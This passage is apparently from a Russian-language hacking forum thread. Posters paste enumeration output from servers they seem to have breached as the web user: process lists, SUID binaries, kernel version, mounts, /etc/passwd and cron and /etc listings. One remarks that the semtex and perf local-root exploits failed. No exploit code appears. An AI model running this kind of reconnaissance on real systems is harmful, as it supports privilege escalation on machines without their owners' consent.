postfix  24793  0.0  0.0  42548  2472 ?        S    Aug28   0:03 tlsmgr -l -t unix -u -c
root     24973  0.0  0.0 252376 16932 ?        S    01:28   0:00 /usr/sbin/apache2 -k start
root     25343  0.0  0.0      0     0 ?        S    01:28   0:00 [kworker/7:1]
root     25374  0.0  0.0      0     0 ?        S    01:28   0:00 [kworker/3:0]
root     25896  0.0  0.0  19672  1896 pts/7    Ss   Nov05   0:00 /bin/bash
clamav   25913  0.0  0.0  44048  2224 ?        Ss   Oct01  77:05 /usr/bin/freshclam -d --quiet
root     25941  0.0  0.0  43476  3808 pts/7    S+   Nov05   0:00 mc
root     25945  0.0  0.0  19676  2164 pts/14   Ss+  Nov05   0:00 bash -rcfile .bashrc
root     25980  0.0  0.0      0     0 ?        S    01:30   0:00 [kworker/6:0]
root     26215  0.0  0.0      0     0 ?        S    01:30   0:00 [kworker/1:0]
postfix  26426  0.0  0.0  40016  2376 ?        S    01:30   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  26427  0.0  0.0  44308  2692 ?        S    01:30   0:00 smtp -t unix -u -c
postfix  26428  0.0  0.0  44308  2692 ?        S    01:30   0:00 smtp -t unix -u -c
postfix  26429  0.0  0.0  40036  2376 ?        S    01:30   0:00 bounce -z -n defer -t unix -u -c
root     26433  0.0  0.0      0     0 ?        S    01:30   0:00 [kworker/0:2]
root     26526  1.0  0.0  72044  3456 ?        Ss   01:30   0:00 sshd: unknown [priv]
sshd     26527  0.0  0.0  51416  1564 ?        S    01:30   0:00 sshd: unknown [net]
www-data 26533  0.0  0.0   4316   688 pts/0    S+   01:30   0:00 sh pes.sh
1002     26560  0.0  0.0 260060 27676 ?        R    01:30   0:00 /usr/sbin/apache2 -k start
www-data 26561  0.0  0.0  15448  1208 pts/0    R+   01:30   0:00 ps -aux
root     29833  0.0  0.0  25784  3664 ?        Ss   Aug30   1:15 SCREEN -d -R
root     30268  0.0  0.0  32284 19752 ?        S<L  Dec03   0:15 /usr/bin/atop -a -w /var/log/atop/atop_20131203 600
root     31557  0.0  0.0 252376 16932 ?        S    00:47   0:01 /usr/sbin/apache2 -k start
ntp      31673  0.0  0.0  39636  1800 ?        Ss   Aug28   6:24 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 108:112
root     31933  0.0  0.0 252376 16932 ?        S    00:47   0:01 /usr/sbin/apache2 -k start
root     32037  0.0  0.0  21348   244 ?        S    Oct02   0:00 udevd --daemon
root     32038  0.0  0.0  21292   396 ?        S    Oct02   0:00 udevd --daemon
root     32134  0.0  0.0 252376 16932 ?        S    00:47   0:01 /usr/sbin/apache2 -k start
root     32228  0.0  0.0 252376 16932 ?        S    00:47   0:01 /usr/sbin/apache2 -k start
root     32679  0.0  0.0  22440  1308 ?        S    Oct02   6:36 /usr/lib/gamin/gam_server

================================================
SUID FILES:
================================================
-rwsr-xr-x 1 root root 245064 Feb  9  2013 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10496 Dec 30  2012 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 68024 May 26  2012 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36432 May 26  2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 51096 May 26  2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 66536 Apr 16  2012 /usr/bin/mtr
-rwsr-xr-x 1 root root 41272 May 26  2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 46264 May 26  2012 /usr/bin/chfn
-rwsr-sr-x 1 root mail 89280 Jun  7  2012 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55456 Jun  9  2012 /usr/bin/at
-rwsr-xr-x 1 root root 69080 Dec 11  2012 /bin/umount
-rwsr-xr-x 1 root root 36136 Apr 12  2011 /bin/ping
-rwsr-xr-x 1 root root 36816 May 26  2012 /bin/su
-rwsr-xr-x 1 root root 36896 Apr 12  2011 /bin/ping6
-rwsr-xr-x 1 root root 94776 Dec 11  2012 /bin/mount
semtex и perf не взяли(
Faaax вне форума   Ответить с цитированием
Старый 04.12.2013, 17:40   #1018
OxoTnik
 
Аватар для OxoTnik
 
Регистрация: 26.01.2012
Сообщений: 9
Репутация: 0
По умолчанию

uname -a

Linux 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

$ mount
/dev/mapper/vg-root on / type ext4 (rw)
proc on /proc type proc (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext2 (rw)
/dev/mapper/vg-mysql on /var/lib/mysql type ext4 (rw)
/dev/mapper/vg-log on /var/log type ext4 (rw)
/dev/mapper/vg-www on /www type ext4 (rw)
/dev/sdc on /mnt/flash type xfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg-root 10G 1.9G 7.7G 20% /
/dev/md0 496M 23M 449M 5% /boot
/dev/mapper/vg-mysql 50G 562M 47G 2% /var/lib/mysql
/dev/mapper/vg-log 50G 2.0G 46G 5% /var/log
/dev/mapper/vg-www 50G 11G 37G 22% /www
/dev/sdc 15G 33M 15G 1% /mnt/flash


ls -la /boot
total 19936
dr-xr-xr-x 5 root root 1024 Jan 17 2013 .
drwxr-xr-x 26 root root 4096 Jun 28 01:36 ..
-rw-r--r-- 1 root root 171 Dec 19 2012 .vmlinuz-2.6.32-279.19.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 2341554 Dec 19 2012 System.map-2.6.32-279.19.1.el6.x86_64
lrwxrwxrwx 1 root root 1 Jan 17 2013 boot -> .
-rw-r--r-- 1 root root 101977 Dec 19 2012 config-2.6.32-279.19.1.el6.x86_64
drwxr-xr-x 3 root root 1024 Jul 11 2011 efi
drwxr-xr-x 2 root root 1024 Jan 17 2013 grub
-rw-r--r-- 1 root root 13742636 Jan 17 2013 initramfs-2.6.32-279.19.1.el6.x86_64.img
drwx------ 2 root root 12288 Jul 11 2011 lost+found
-rw-r--r-- 1 root root 179242 Dec 19 2012 symvers-2.6.32-279.19.1.el6.x86_64.gz
-rwxr-xr-x 1 root root 3941776 Dec 19 2012 vmlinuz-2.6.32-279.19.1.el6.x86_64

cat /proc/version
Linux version 2.6.32-279.19.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Dec 19 07:05:20 UTC 2012

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
user1:x:500:48::/www/user1:/bin/sh
user2:x:501:501::/www/user2:/bin/sh

cat /etc/issue
CentOS release 6.3 (Final)
Kernel \r on an \m

cat /etc/issue.net
CentOS release 6.3 (Final)
Kernel \r on an \m

cat /proc/sys/vm/mmap_min_addr
4096

cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed


$ ls -la /etc/cron.d
total 16
drwxr-xr-x 2 root root 4096 Dec 3 17:29 .
drwxr-xr-x 66 root root 4096 Oct 29 04:11 ..
-rw-r--r-- 1 root root 113 Jul 19 2011 0hourly
-rw-r--r-- 1 root root 108 Apr 26 2012 raid-check

ls -la /etc/cron.hourly
total 12
drwxr-xr-x 2 root root 4096 Sep 27 2011 .
drwxr-xr-x 66 root root 4096 Oct 29 04:11 ..
-rwxr-xr-x 1 root root 424 Jul 19 2011 0anacron


ls -la /etc/cron.monthly
total 8
drwxr-xr-x 2 root root 4096 Sep 27 2011 .
drwxr-xr-x 66 root root 4096 Oct 29 04:11 ..


ls -la /etc/cron.weekly
total 8
drwxr-xr-x 2 root root 4096 Sep 27 2011 .
drwxr-xr-x 66 root root 4096 Oct 29 04:11 ..



ls -la /etc
Код:
total 1360
drwxr-xr-x  66 root root   4096 Oct 29 04:11 .
drwxr-xr-x  26 root root   4096 Jun 28 01:36 ..
-rw-------   1 root root      0 Jul 11  2011 .pwd.lock
-rw-r--r--   1 root root   4439 Apr 17  2012 DIR_COLORS
-rw-r--r--   1 root root   5139 Apr 17  2012 DIR_COLORS.256color
-rw-r--r--   1 root root   4113 Apr 17  2012 DIR_COLORS.lightbgcolor
drwxr-xr-x   3 root root   4096 Aug 15  2012 NetworkManager
drwxr-xr-x   4 root root   4096 Sep 24  2012 X11
drwxr-xr-x   4 root root   4096 Jul 11  2011 acpi
-rw-r--r--   1 root root     44 Jan  9  2013 adjtime
-rw-r--r--   1 root root   1512 Jan 12  2010 aliases
-rw-r--r--   1 root root  12288 Jul 11  2011 aliases.db
drwxr-xr-x   2 root root   4096 Jan 17  2013 alternatives
-rw-r--r--   1 root root    541 Jul 19  2011 anacrontab
drwxr-x---   3 root root   4096 Jul 10  2012 audisp
drwxr-x---   2 root root   4096 Jul 10  2012 audit
drwxr-xr-x   2 root root   4096 Jul 10  2012 bash_completion.d
-rw-r--r--   1 root root   2681 Jun 22  2012 bashrc
drwxr-xr-x   2 root root   4096 Nov  5  2012 blkid
-rw-r--r--   1 root root     27 Jun 26  2012 centos-release
-rw-r--r--   1 root root    812 Jun 22  2012 cgconfig.conf
-rw-r--r--   1 root root   1705 Jun 22  2012 cgrules.conf
-rw-r--r--   1 root root    161 Jun 22  2012 cgsnapshot_blacklist.conf
drwxr-xr-x   2 root root   4096 Jun 22  2012 chkconfig.d
drwxr-xr-x   2 root root   4096 Dec  3 17:29 cron.d
drwxr-xr-x   2 root root   4096 Feb 21  2013 cron.daily
-rw-r--r--   1 root root      0 Jul 19  2011 cron.deny
drwxr-xr-x   2 root root   4096 Sep 27  2011 cron.hourly
drwxr-xr-x   2 root root   4096 Sep 27  2011 cron.monthly
drwxr-xr-x   2 root root   4096 Sep 27  2011 cron.weekly
-rw-r--r--   1 root root    457 Sep 27  2011 crontab
-rw-r--r--   1 root root      0 Jul 11  2011 crypttab
-rw-r--r--   1 root root   1602 Jun 22  2012 csh.cshrc
-rw-r--r--   1 root root    794 Jun 22  2012 csh.login
drwxr-xr-x   3 root root   4096 Jul 11  2011 dbus-1
drwxr-xr-x   2 root root   4096 Nov 19  2012 default
drwxr-xr-x   2 root root   4096 Jul 10  2012 depmod.d
drwxr-x---   3 root root   4096 Aug 15  2012 dhcp
-rw-r--r--   1 root root    519 Oct  3  2012 dracut.conf
drwxr-xr-x   2 root root   4096 Oct  3  2012 dracut.conf.d
-rw-r--r--   1 root root      0 Jun 22  2012 environment
-rw-r--r--   1 root root     28 May 10  2012 ethers
-rw-r--r--   1 root root      0 Jan 12  2010 exports
lrwxrwxrwx   1 root root     56 Jan 17  2013 favicon.png -> /usr/share/icons/hicolor/16x16/apps/system-logo-icon.png
-rw-r--r--   1 root root     64 Jun 22  2012 filesystems
-rw-r--r--   1 root root    391 Jan 17  2013 fstab
-rw-r--r--   1 root root      0 Nov  1  2012 gai.conf
drwxr-xr-x   2 root root   4096 Apr 16  2012 gcrypt
drwxr-xr-x   2 root root   4096 Nov 11  2010 gnupg
-rw-r--r--   1 root root    581 Jan 17  2013 group
-rw-------   1 root root    557 Jan 17  2013 group-
lrwxrwxrwx   1 root root     22 Jan 17  2013 grub.conf -> ../boot/grub/grub.conf
----------   1 root root    470 Jan 17  2013 gshadow
-rw-------   1 root root    460 Jan 17  2013 gshadow-
-rw-r--r--   1 root root      9 Jun 22  2012 host.conf
-rw-r--r--   1 root root    299 Jan 17  2013 hosts
-rw-r--r--   1 root root    370 Jan 12  2010 hosts.allow
-rw-r--r--   1 root root    460 Jan 12  2010 hosts.deny
drwxr-xr-x   4 root root   4096 Jan 17  2013 httpd
drwxr-xr-x   2 root root   4096 Sep 24  2012 init
lrwxrwxrwx   1 root root     11 Jan 17  2013 init.d -> rc.d/init.d
-rw-r--r--   1 root root    884 Sep 17  2012 inittab
-rw-r--r--   1 root root    940 Jul 11  2011 inputrc
drwxr-xr-x   2 root root   4096 Jul 10  2012 iproute2
-rw-r--r--   1 root root     47 Jun 26  2012 issue
-rw-r--r--   1 root root     46 Jun 26  2012 issue.net
-rw-r--r--   1 root root    449 Sep 11  2012 krb5.conf
-rw-r--r--   1 root root  19460 Feb 21  2013 ld.so.cache
-rw-r--r--   1 root root     28 May  4  2010 ld.so.conf
drwxr-xr-x   2 root root   4096 Jan 17  2013 ld.so.conf.d
-rw-r-----   1 root root    191 Mar  1  2012 libaudit.conf
-rw-r--r--   1 root root   2293 Apr  5  2012 libuser.conf
lrwxrwxrwx   1 root root     33 Jan 17  2013 localtime -> /usr/share/zoneinfo/Europe/Moscow
-rw-r--r--   1 root root   1816 Jun 28  2011 login.defs
-rw-r--r--   1 root root    662 Aug 29  2007 logrotate.conf
drwxr-xr-x   2 root root   4096 Jan 22  2013 logrotate.d
drwxr-xr-x   5 root root   4096 Jan  9  2013 lvm
-rw-r--r--   1 root root    111 Mar 15  2012 magic
-rw-r--r--   1 root root   1909 Aug 22  2010 mail.rc
-rw-r--r--   1 root root    272 Nov 18  2009 mailcap
drwxr-xr-x   2 root root   4096 Jul 11  2011 makedev.d
-rw-r--r--   1 root root   4940 Apr  3  2012 man.config
drwxr-xr-x   2 root root   4096 Jan 17  2013 mc
-rw-r--r--   1 root root    217 Jan 17  2013 mdadm.conf
-rw-r--r--   1 root root  43591 Sep 23  2011 mime.types
-rw-r--r--   1 root root    801 Sep  8  2009 mke2fs.conf
drwxr-xr-x   2 root root   4096 Jul 10  2012 modprobe.d
-rw-r--r--   1 root root      0 Jan 12  2010 motd
-rw-r--r--   1 root root    331 Jun 28 01:36 mtab
-rw-r--r--   1 root root   1027 Jan 18  2013 my.cnf
-rw-r--r--   1 root root     58 Sep 17  2012 networks
-rw-r--r--   1 root root   1688 May  4  2010 nsswitch.conf
drwxr-xr-x   3 root root   4096 Mar 14  2012 ntp
-rw-r--r--   1 root root   2113 Jan 17  2013 ntp.conf
drwxr-xr-x   3 root root   4096 Sep 24  2012 openldap
drwxr-xr-x   2 root root   4096 Sep 23  2011 opt
drwxr-xr-x   2 root root   4096 Jan 17  2013 pam.d
-rw-r--r--   1 root root   1132 Feb  7  2013 passwd
-rw-r--r--   1 root root   1065 Jan 17  2013 passwd-
-rw-r--r--   1 root root   1101 Jan 17  2013 passwd.OLD
drwxr-xr-x   2 root root   4096 Jan 17  2013 php-zts.d
drwxr-xr-x   2 root root   4096 Jan 17  2013 php.d
-rw-r--r--   1 root root  71879 Oct 29 04:11 php.ini
drwxr-xr-x   8 root root   4096 Sep 30  2011 pki
drwxr-xr-x   2 root root   4096 Mar 14  2012 plymouth
drwxr-xr-x   5 root root   4096 Sep 23  2011 pm
drwxr-xr-x   2 root root   4096 Aug 21  2010 popt.d
drwxr-xr-x   2 root root   4096 Jan 17  2013 postfix
drwxr-xr-x   3 root root   4096 Sep 24  2012 ppp
-rw-r--r--   1 root root    233 Jan 12  2010 printcap
-rw-r--r--   1 root root   1793 Jun 22  2012 profile
drwxr-xr-x   2 root root   4096 Jan 17  2013 profile.d
-rw-r--r--   1 root root   6455 Jan 12  2010 protocols
lrwxrwxrwx   1 root root      7 Jan 17  2013 rc -> rc.d/rc
drwxr-xr-x  10 root root   4096 Sep 24  2012 rc.d
lrwxrwxrwx   1 root root     13 Jan 17  2013 rc.local -> rc.d/rc.local
-rwxr-xr-x   1 root root    143 Jan 17  2013 rc.modules
lrwxrwxrwx   1 root root     15 Jan 17  2013 rc.sysinit -> rc.d/rc.sysinit
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc0.d -> rc.d/rc0.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc1.d -> rc.d/rc1.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc2.d -> rc.d/rc2.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc3.d -> rc.d/rc3.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc4.d -> rc.d/rc4.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc5.d -> rc.d/rc5.d
lrwxrwxrwx   1 root root     10 Jan 17  2013 rc6.d -> rc.d/rc6.d
lrwxrwxrwx   1 root root     14 Jan 17  2013 redhat-release -> centos-release
-rw-r--r--   1 root root    243 Jan 17  2013 resolv.conf
-rw-r--r--   1 root root   1615 May  4  2010 rpc
drwxr-xr-x   2 root root   4096 Jan 17  2013 rpm
-rw-r--r--   1 root root   2875 May 17  2012 rsyslog.conf
drwxr-xr-x   2 root root   4096 Jun 22  2012 rsyslog.d
-rw-r--r--   1 root root    930 Sep 17  2012 rwtab
drwxr-xr-x   2 root root   4096 Sep 17  2012 rwtab.d
drwxr-xr-x   2 root root   4096 Jan 17  2013 sasl2
-rw-------   1 root root    122 Jan 12  2010 securetty
drwxr-xr-x   6 root root   4096 May 16  2012 security
drwxr-xr-x   3 root root   4096 Jan  3  2013 selinux
-rw-r--r--   1 root root 641020 Jun 22  2012 services
-rw-r--r--   1 root root    216 Jun 22  2012 sestatus.conf
----------   1 root root   1037 Feb  7  2013 shadow
----------   1 root root    697 Jan 17  2013 shadow-
-rw-r--r--   1 root root     32 Jan 12  2010 shells
drwxr-xr-x   2 root root   4096 May 16  2012 skel
-rw-r--r--   1 root root   6717 Jun 22  2012 smartd.conf
drwxr-xr-x   2 root root   4096 Jan 17  2013 ssh
drwxr-xr-x   2 root root   4096 Sep 30  2011 ssl
-rw-r--r--   1 root root    212 Sep 17  2012 statetab
drwxr-xr-x   2 root root   4096 Sep 17  2012 statetab.d
-r--r-----   1 root root   1031 Jul 19  2012 sudo-ldap.conf
-r--r-----   1 root root   4002 Mar  1  2012 sudoers
drwxr-x---   2 root root   4096 Aug  6  2012 sudoers.d
drwxr-xr-x   8 root root   4096 Feb 21  2013 sysconfig
-rw-r--r--   1 root root    772 Jan 17  2013 sysctl.conf
lrwxrwxrwx   1 root root     14 Jan 17  2013 system-release -> centos-release
-rw-r--r--   1 root root     25 Jun 26  2012 system-release-cpe
drwxr-xr-x   2 root root   4096 Aug 18  2010 terminfo
drwxr-xr-x   4 root root   4096 Jul 10  2012 udev
-rw-r--r--   1 root root   1962 Feb 17  2012 vimrc
-rw-r--r--   1 root root   1962 Feb 17  2012 virc
drwxr-xr-x   2 root root   4096 Jan 18  2013 vsftpd
drwxr-xr-x 120 root root   4096 Jan 18  2013 webmin
-rw-r--r--   1 root root   4479 Aug 25  2010 wgetrc
drwxr-xr-x   3 root root   4096 Sep 23  2011 xdg
drwxr-xr-x   2 root root   4096 Jul 10  2012 xinetd.d
drwxr-xr-x   5 root root   4096 Jul 10  2012 yum
-rw-r--r--   1 root root    969 Jun 22  2012 yum.conf
drwxr-xr-x   2 root root   4096 Jan 17  2013 yum.repos.d
ls -la --full-time /lib
total 32
dr-xr-xr-x 8 root root 4096 2013-01-17 22:32:14.000000000 +0400 .
drwxr-xr-x 26 root root 4096 2013-06-28 01:36:19.000000000 +0400 ..
lrwxrwxrwx 1 root root 14 2013-01-17 22:32:14.000000000 +0400 cpp -> ../usr/bin/cpp
drwxr-xr-x 40 root root 4096 2013-01-09 11:36:05.000000000 +0400 firmware
drwxr-xr-x 6 root root 4096 2011-07-11 12:54:18.000000000 +0400 kbd
dr-xr-xr-x 3 root root 4096 2013-01-09 11:43:27.000000000 +0400 modules
drwxr-xr-x 2 root root 4096 2012-04-16 13:04:59.000000000 +0400 security
drwxr-xr-x 6 root root 4096 2011-07-11 12:53:17.000000000 +0400 terminfo
drwxr-xr-x 5 root root 4096 2012-12-14 14:16:08.000000000 +0400 udev


ps axfu
Код:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         2  0.0  0.0      0     0 ?        S    Jun28   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Jun28   4:20  \_ [migration/0]
root         4  0.0  0.0      0     0 ?        S    Jun28   1:02  \_ [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/0]
root         6  0.0  0.0      0     0 ?        S    Jun28   0:11  \_ [watchdog/0]
root         7  0.0  0.0      0     0 ?        S    Jun28   0:26  \_ [migration/1]
root         8  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/1]
root         9  0.0  0.0      0     0 ?        S    Jun28   3:10  \_ [ksoftirqd/1]
root        10  0.0  0.0      0     0 ?        S    Jun28   0:11  \_ [watchdog/1]
root        11  0.0  0.0      0     0 ?        S    Jun28   0:01  \_ [migration/2]
root        12  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/2]
root        13  0.0  0.0      0     0 ?        S    Jun28  14:37  \_ [ksoftirqd/2]
root        14  0.0  0.0      0     0 ?        S    Jun28   0:08  \_ [watchdog/2]
root        15  0.0  0.0      0     0 ?        S    Jun28   0:01  \_ [migration/3]
root        16  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/3]
root        17  0.0  0.0      0     0 ?        S    Jun28   9:50  \_ [ksoftirqd/3]
root        18  0.0  0.0      0     0 ?        S    Jun28   0:08  \_ [watchdog/3]
root        19  0.0  0.0      0     0 ?        S    Jun28   0:01  \_ [migration/4]
root        20  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/4]
root        21  0.0  0.0      0     0 ?        S    Jun28   3:32  \_ [ksoftirqd/4]
root        22  0.0  0.0      0     0 ?        S    Jun28   0:09  \_ [watchdog/4]
root        23  0.0  0.0      0     0 ?        S    Jun28   0:06  \_ [migration/5]
root        24  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/5]
root        25  0.0  0.0      0     0 ?        S    Jun28   6:17  \_ [ksoftirqd/5]
root        26  0.0  0.0      0     0 ?        S    Jun28   0:08  \_ [watchdog/5]
root        27  0.0  0.0      0     0 ?        S    Jun28   0:01  \_ [migration/6]
root        28  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/6]
root        29  0.0  0.0      0     0 ?        S    Jun28   3:53  \_ [ksoftirqd/6]
root        30  0.0  0.0      0     0 ?        S    Jun28   0:08  \_ [watchdog/6]
root        31  0.0  0.0      0     0 ?        S    Jun28   0:04  \_ [migration/7]
root        32  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [migration/7]
root        33  0.0  0.0      0     0 ?        S    Jun28   2:18  \_ [ksoftirqd/7]
root        34  0.0  0.0      0     0 ?        S    Jun28   0:08  \_ [watchdog/7]
root        35  0.0  0.0      0     0 ?        S    Jun28  29:34  \_ [events/0]
root        36  0.0  0.0      0     0 ?        S    Jun28   5:28  \_ [events/1]
root        37  0.0  0.0      0     0 ?        S    Jun28   4:58  \_ [events/2]
root        38  0.0  0.0      0     0 ?        S    Jun28   4:46  \_ [events/3]
root        39  0.0  0.0      0     0 ?        S    Jun28   5:40  \_ [events/4]
root        40  0.0  0.0      0     0 ?        S    Jun28   5:06  \_ [events/5]
root        41  0.0  0.0      0     0 ?        S    Jun28   5:32  \_ [events/6]
root        42  0.0  0.0      0     0 ?        S    Jun28   8:03  \_ [events/7]
root        43  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [cgroup]
root        44  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [khelper]
root        45  0.0  0.0      0     0 ?        S    Jun28  34:56  \_ [netns]
root        46  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [async/mgr]
root        47  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [pm]
root        48  0.0  0.0      0     0 ?        S    Jun28   0:34  \_ [sync_supers]
root        49  0.0  0.0      0     0 ?        S    Jun28   0:41  \_ [bdi-default]
root        50  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/0]
root        51  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/1]
root        52  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/2]
root        53  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/3]
root        54  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/4]
root        55  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/5]
root        56  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/6]
root        57  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kintegrityd/7]
root        58  0.0  0.0      0     0 ?        S    Jun28  58:54  \_ [kblockd/0]
root        59  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/1]
root        60  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/2]
root        61  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/3]
root        62  0.0  0.0      0     0 ?        S    Jun28   0:06  \_ [kblockd/4]
root        63  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/5]
root        64  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/6]
root        65  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kblockd/7]
root        66  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kacpid]
root        67  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kacpi_notify]
root        68  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kacpi_hotplug]
root        69  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/0]
root        70  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/1]
root        71  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/2]
root        72  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/3]
root        73  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/4]
root        74  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/5]
root        75  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/6]
root        76  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata/7]
root        77  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ata_aux]
root        78  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ksuspend_usbd]
root        79  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [khubd]
root        80  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kseriod]
root        81  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/0]
root        82  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/1]
root        83  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/2]
root        84  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/3]
root        85  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/4]
root        86  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/5]
root        87  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/6]
root        88  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md/7]
root        89  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/0]
root        90  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/1]
root        91  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/2]
root        92  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/3]
root        93  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/4]
root        94  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/5]
root        95  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/6]
root        96  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [md_misc/7]
root        97  0.0  0.0      0     0 ?        S    Jun28   0:04  \_ [khungtaskd]
root        98  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kswapd0]
root        99  0.0  0.0      0     0 ?        SN   Jun28   0:00  \_ [ksmd]
root       100  0.0  0.0      0     0 ?        SN   Jun28  21:28  \_ [khugepaged]
root       101  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/0]
root       102  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/1]
root       103  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/2]
root       104  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/3]
root       105  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/4]
root       106  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/5]
